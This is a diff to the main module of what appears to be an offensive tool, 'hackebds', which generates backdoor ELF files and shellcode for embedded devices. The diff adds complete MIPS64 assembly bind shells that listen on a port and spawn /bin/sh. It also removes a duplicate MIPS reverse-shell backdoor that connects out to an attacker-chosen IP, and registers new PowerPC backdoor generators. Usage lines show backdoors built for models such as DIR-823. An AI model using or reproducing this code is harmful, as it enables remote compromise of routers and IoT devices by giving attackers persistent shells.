@@ -4,6 +4,9 @@ import argparse
 from . import model_choise
 from . import cve_info
 import os
+from hackebds.ESH import *
+from hackebds.powerpc_info import *
+
 
 def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	context.arch='mips'
@@ -576,7 +579,7 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
-		print(shellcode_hex)
+		#print(shellcode_hex)
 		return shellcode
 	else:
 		#log.info("waiting 3s")
@@ -586,7 +589,7 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
-		print(shellcode_hex)
+		#print(shellcode_hex)
 		return shellcode
 
 def armebv7_reverse_sl(reverse_ip,reverse_port):
@@ -980,44 +983,6 @@ def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
 		context.bits="32"
 		context.endian="little"
 
-def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
-	context.arch='mips'
-	context.endian='little'
-	context.bits="32"
-	shellcode_connect=asm(shellcraft.connect(reverse_ip,reverse_port))
-	shellcode_dump_sh='''
-	move $a0,$s0
-	nor $a1,$zero,-1
-	li  $v0,0xfdf
-	syscall 0x40404
-	move $a0,$s0
-	li  $t9,-2
-	nor $a1,$t9,$zero
-	li  $v0,0xfdf
-	syscall 0x40404
-	move $a0,$s0
-	li  $t9,-3
-	nor $a1,$t9,$zero
-	li  $v0,0xfdf
-	syscall 0x40404
-	'''
-	log.success("reverse_ip is: "+ reverse_ip)
-	log.success("reverse_port is: "+str(reverse_port))
-	shellcode_dump_sh=asm(shellcode_dump_sh)
-	shellcode_execve=asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
-	ELF_data_shellcode=shellcode_connect+shellcode_dump_sh+shellcode_execve
-	ELF_data=make_elf(ELF_data_shellcode)
-	if filename==None:
-		log.info("waiting 3s")
-		sleep(1)
-		filename="mipsel_backdoor"
-		f=open(filename,"wb")
-		f.write(ELF_data)
-		f.close()
-		log.success("mipsel_backdoor is ok in current path ./")
-		context.arch='i386'
-		context.bits="32"
-		context.endian="little"
 
 def mips_backdoor(reverse_ip,reverse_port,filename=None):
 	context.arch='mips'
@@ -1166,6 +1131,7 @@ def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
 	connect number v0=0x13b1
 	dup2  number v0=0x13A8
 	execve number v0=0x13c1
+
 	:param reverse_ip:
 	:param reverse_port:
 	:param filename:
@@ -2184,7 +2150,7 @@ def armv7eb_bind_shell(listen_port, passwd, filename = None):
 	if(filename==None):
 		log.info("waiting 3s")
 		sleep(1)
-		f=open("./armelv7_bind_shell","wb")
+		f=open("./armebv7_bind_shell","wb")
 		f.write(data)
 		f.close()
 		log.success("armebv7_bind_shell is ok in current path ./")
@@ -2584,6 +2550,257 @@ def aarch64_bind_shell(listen_port, passwd, filename = None):
 		context.bits="32"
 		context.endian="little"
 
+'''
+2022.11.8 add
+bind 0x13b8
+accept 0x13b2
+listem 0x13b9
+socket number v0=0x13b0
+connect number v0=0x13b1
+dup2  number v0=0x13A8
+execve number v0=0x13c1
+'''
+def mips64el_bind_shell(listen_port, passwd, filename=None):
+	context.arch = 'mips64'
+	context.endian = 'little'
+	context.bits = '64'
+	log.success("bind port is set to "+ str(listen_port))
+	log.success("passwd is set to '%s'"%passwd )
+	listen_port = '0x'+enhex(p16(listen_port))
+	passwd_len = hex(len(passwd))
+	shellcode = '''
+	li      $t9, -3
+	nor     $a0, $t9, $zero
+	li      $t9, -3
+	nor     $a1, $t9, $zero
+	slti    $a2, $zero, -1
+	li      $v0, 0x13b0
+	syscall 0x40404
+	li      $t3,0x7350
+	andi    $s0,$v0,0xffff
+	li      $t2,-17
+	nor     $t2,$t2,$zero
+	li      $t1, %s
+	sllv    $t1,$t1,$t2
+	li      $t2,-3
+	nor     $t2,$t2,$zero
+	or      $t1,$t1,$t2
+	sw      $t1,-32($sp)
+	sw      $zero,-28($sp)
+	sw      $zero,-24($sp)
+	sw      $zero,-20($sp)
+	or      $a0,$s0,$s0
+	li      $t2,-17
+	nor     $a2,$t2,$zero
+	daddi   $a1,$sp,-32
+	li      $v0,0x13b8
+	syscall 0x40404
+	li      $t3,0x7350
+	or      $a0,$s0,$s0 
+	li      $a1,2
+	li      $v0,0x13b9
+	syscall
+	li      $t3,0x7350
+	or      $a0,$s0,$s0
+	slti    $a1,$zero,-1
+	slti    $a2,$zero,-1
+	li      $v0,0x13b2
+	syscall 
+	li      $t3,0x7350
+	andi    $s0,$v0,0xffff
+	or      $a0,$s0,$s0 
+	li      $t2,-3 
+	nor     $a1,$t2,$zero 
+	li      $v0,0x13a8
+	syscall
+	li      $t3,0x7350
+	or      $a0,$s0,$s0
+	slti    $a1,$zero,0x0101
+	li      $v0,0x13a8
+	syscall
+	li      $t3,0x7350
+	or      $a0,$s0,$s0
+	slti    $a1,$zero,-1
+	li      $v0,0x13a8
+	syscall
+	'''
+	shellcode_execve='''
+	lui     $t1, 0x6e69
+	ori     $t1, $t1, 0x622f
+	sw      $t1, -8($sp)
+	lui     $t9, 0xff97
+	ori     $t9, $t9, 0x8cd0
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu   $sp, $sp, -8
+	dadd     $a0, $sp, $zero
+	lui     $t1, 0x6e69
+	ori     $t1, $t1, 0x622f
+	sw      $t1,-12($sp)
+	lui     $t9, 0xff97
+	ori     $t9, $t9, 0x8cd0
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	sw      $zero, -4($sp)
+	daddiu   $sp, $sp, -12
+	slti    $a1, $zero, -1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	li      $t9, -9
+	nor     $a1, $t9, $zero
+	dadd     $a1, $sp, $a1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	dadd     $a1, $sp, $zero
+	slti    $a2, $zero, -1
+	li      $v0, 0x13c1
+	syscall 0x40404
+	'''
+	shellcode = shellcode%(listen_port) + shellcode_execve
+	shellcode = asm(shellcode)
+	data=make_elf(shellcode)
+	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
+		f=open("./mips64el_bind_shell","wb")
+		f.write(data)
+		f.close()
+		log.success("mips64el_bind_shell is ok in current path ./")
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+
+
+def mips64_bind_shell(listen_port, passwd, filename=None):
+	context.arch = 'mips64'
+	context.endian = 'big'
+	context.bits = '64'
+	log.success("bind port is set to "+ str(listen_port))
+	log.success("passwd is set to '%s'"%passwd )
+	listen_port = '0x'+enhex(p16(listen_port))
+	passwd_len = hex(len(passwd))
+	shellcode = '''
+	li      $t9, -3
+	nor     $a0, $t9, $zero
+	li      $t9, -3
+	nor     $a1, $t9, $zero
+	slti    $a2, $zero, -1
+	li      $v0, 0x13b0
+	syscall 0x40404
+	li      $t3,0x7350
+	andi    $s0,$v0,0xffff
+	li      $t2,-17
+	nor     $t2,$t2,$zero
+	li      $t1, -3
+	nor     $t1,$t1,$zero
+	sllv    $t1,$t1,$t2
+	li      $t2,%s
+	or      $t1,$t1,$t2
+	sw      $t1,-32($sp)
+	sw      $zero,-28($sp)
+	sw      $zero,-24($sp)
+	sw      $zero,-20($sp)
+	or      $a0,$s0,$s0
+	li      $t2,-17
+	nor     $a2,$t2,$zero
+	daddi   $a1,$sp,-32
+	li      $v0,0x13b8
+	syscall 0x40404
+	li      $t3,0x7350
+	or      $a0,$s0,$s0 
+	li      $a1,2
+	li      $v0,0x13b9
+	syscall
+	li      $t3,0x7350
+	or      $a0,$s0,$s0
+	slti    $a1,$zero,-1
+	slti    $a2,$zero,-1
+	li      $v0,0x13b2
+	syscall 
+	li      $t3,0x7350
+	andi    $s0,$v0,0xffff
+	or      $a0,$s0,$s0 
+	li      $t2,-3 
+	nor     $a1,$t2,$zero 
+	li      $v0,0x13a8
+	syscall
+	li      $t3,0x7350
+	or      $a0,$s0,$s0
+	slti    $a1,$zero,0x0101
+	li      $v0,0x13a8
+	syscall
+	li      $t3,0x7350
+	or      $a0,$s0,$s0
+	slti    $a1,$zero,-1
+	li      $v0,0x13a8
+	syscall
+	'''
+	shellcode_execve='''
+	lui     $t1, 0x2f62
+	ori     $t1, $t1, 0x696e
+	sw      $t1, -8($sp)
+	lui     $t9, 0xd08c
+	ori     $t9, $t9, 0x97ff
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu   $sp, $sp, -8
+	dadd     $a0, $sp, $zero
+	lui     $t1, 0x2f62
+	ori     $t1, $t1, 0x696e
+	sw      $t1, -12($sp)
+	lui     $t9, 0xd08c
+	ori     $t9, $t9, 0x97ff
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	sw      $zero, -4($sp)
+	daddiu   $sp, $sp, -12
+	slti    $a1, $zero, -1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	li      $t9, -9
+	nor     $a1, $t9, $zero
+	dadd     $a1, $sp, $a1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	dadd     $a1, $sp, $zero
+	slti    $a2, $zero, -1
+	li      $v0,0x13c1
+	syscall 0x40404
+	'''
+	shellcode = shellcode%(listen_port) + shellcode_execve
+	shellcode = asm(shellcode)
+	data=make_elf(shellcode)
+	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
+		f=open("./mips64_bind_shell","wb")
+		f.write(data)
+		f.close()
+		log.success("mips64_bind_shell is ok in current path ./")
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+
 
 
 '''
@@ -2730,6 +2947,14 @@ def x86el_reverse_sl(reverse_ip, reverse_port):
 		context.endian = "little"
 		return shellcode
 
+'''
+def test1():
+	context.arch = 'mips64'
+	context.endian = 'big'
+	context.bits = '64'
+	return mips64el.sh()
+'''
+
 def version():
     return "version:"+__version__
 
@@ -2746,7 +2971,12 @@ reverse_backdoor_dic = {
     9: aarch64_backdoor,
     10: x86el_backdoor,
     11: x64el_backdoor,
-    12: android_aarch64_backdoor
+    12: android_aarch64_backdoor,
+    13: riscv64el_backdoor,
+    14: powerpc_info.powerpc_backdoor,
+    15: powerpc_info.powerpcle_backdoor,
+	16: powerpc_info.powerpc64_backdoor,
+	17: powerpc_info.powerpc64le_backdoor
 }
 
 reverse_shellcode_dic = {
@@ -2761,14 +2991,20 @@ reverse_shellcode_dic = {
 	9: aarch64_reverse_sl,
 	10: x86el_reverse_sl,
 	11: x64el_reverse_sl,
-	12: None
+	12: None,
+	13: None,
+	14: powerpc_info.ppc_reverse_sl,
+	15: powerpc_info.ppcle_reverse_sl,
+	16: powerpc_info.ppc64_reverse_sl,
+	17: powerpc_info.ppc64le_reverse_sl
 }
 
+
 bind_shell_dic = {
 	1: mips_bind_shell,
 	2: mipsel_bind_shell,
-	3: None,
-	4: None,
+	3: mips64_bind_shell,
+	4: mips64el_bind_shell,
 	5: None,
 	6: armelv7_bind_shell,
 	7: None,
@@ -2792,8 +3028,12 @@ arch_2_num_dic ={
 	'aarch64': 9,
 	'x86': 10,
 	'x64': 11,
-	'android': 12,
-	'powerpc': 13
+	'android':  12,
+	'riscvel64': 13,
+	'powerpc':  14,
+	'powerpcle': 15,
+	'powerpc64':16,
+	'powerpc64le': 17
 
 }
 
@@ -2822,26 +3062,23 @@ def main():
 	example = '''
 example
 	Generate reverse_shell_file Corresponding architecture:
-	Once:    hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -arch mips -model DIR-823 -res reverse_shell_file 
+	Once:   hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -arch mips -model DIR-823 -res reverse_shell_file 
 	Second: hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -model DIR-823 -res reverse_shell_file 
-
 	Generate reverse_shellcode Corresponding architecture:
-	Once:    hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -arch mips -model DIR-823 -res reverse_shellcode
+	Once:   hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -arch mips -model DIR-823 -res reverse_shellcode
 	Second: hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -model DIR-823 -res reverse_shellcode
-
 	Generate bind_shell Corresponding architecture:
-	Once:    hackebds -bind_port 8080 -passwd 1234 -arch mips -model DIR-823 -res bind_shell
+	Once:   hackebds -bind_port 8080 -passwd 1234 -arch mips -model DIR-823 -res bind_shell
 	Second: hackebds -bind_port 8080 -passwd 1234  -model DIR-823 -res bind_shell
-
 	model for CVE info(Online or localfile):
 	hackebds -model DIR-823 -res cveinfo
 	'''
 	parser = argparse.ArgumentParser(example)
 	parser.add_argument('-reverse_ip', required=False, type=str, default=None, help='reverse_ip set')
 	parser.add_argument('-reverse_port', required=False, type=int, default=None ,help='reverse_port set')
-	parser.add_argument('-arch', required=False, type=str, help='Target arch architecturet', choices=('mips','mipsel','mips64','mipsel64','armelv5','armelv7','armebv5','armebv7','aarch64','x86','x64','aarch64','android'))
-	parser.add_argument('-res', required=True, type=str,default="reverse_shell_file", choices=('reverse_shell_file', 'reverse_shellcode', 'bind_shell','cveinfo'))
-	parser.add_argument('-passwd', required=False, type=str,default=None)
+	parser.add_argument('-arch', required=False, type=str, help='Target arch architecturet', choices=('mips','mipsel','mips64','mipsel64','armelv5','armelv7','armebv5','armebv7','aarch64','x86','x64','aarch64','android','powerpc','powerpcle','powerpc64','powerpc64le'))
+	parser.add_argument('-res', required=False,type=str,default=None, choices=('reverse_shell_file', 'reverse_shellcode', 'bind_shell','cveinfo'))
+	parser.add_argument('-passwd', required=False, type=str,default="1234")
 	parser.add_argument('-model', required=False, type=str,default=None, help='device model,learn module')
 	parser.add_argument('-bind_port', required=False, type=int,default=None, help='bind_shell port')
 	parser.add_argument('-filename', required=False, type=str,default=None, help='Generate file name')
@@ -2850,6 +3087,9 @@ example
 	flag_cve_info = 0
 	#@with_argparser(argparse)
 	args = parser.parse_args()
+	if (args.res == None ):
+		log.info("please use -h View Help")
+		return
 	#module_choices.moddel_to_arch(mod)
 	if (os.path.exists("/tmp/hackebds_model_table")):
 		pass
@@ -2887,11 +3127,10 @@ example
 	if (args.res == "reverse_shell_file" and args.arch != None):
 		if (args.reverse_ip!=None or args.reverse_port != None):
 			try:
-				#module_choices.moddel_to_arch(mod)
 				num_getreverse_file(arch_get_number(args.arch), args.reverse_ip, args.reverse_port, args.filename)
 			except Exception as e:
-			#	print(e)
-				log.info("The function is still under development. Please wait")
+				print(e)
+				log.info("please check your IP format and PORT ,If it is correct then The function is still under development. Please wait")
 		else:
 			log.error("please set reverse_ip or reverse_port")
 			return 
@@ -2902,7 +3141,7 @@ example
 				num_getreverse_shellcode(arch_get_number(args.arch), args.reverse_ip, args.reverse_port)
 			except Exception as e:
 				print(e)
-				log.info("The function is still under development. Please wait")
+				log.info("please check your IP format and PORT ,If it is correct then function is still under development. Please wait")
 		else:
 			log.error("please set reverse_ip or reverse_port")
 			return 
@@ -2913,7 +3152,7 @@ example
 				return
 			num_getbind_shell(arch_get_number(args.arch), args.bind_port, args.passwd, args.filename)
 		except Exception as e:
-			log.info("The function is still under development. Please wait")
+			log.info("please check your IP format and PORT ,If it is correct then function is still under development. Please wait")
 			#print(e)
 			#pass
 	if (flag_cve_info == 1 and args.res=="cveinfo" ):
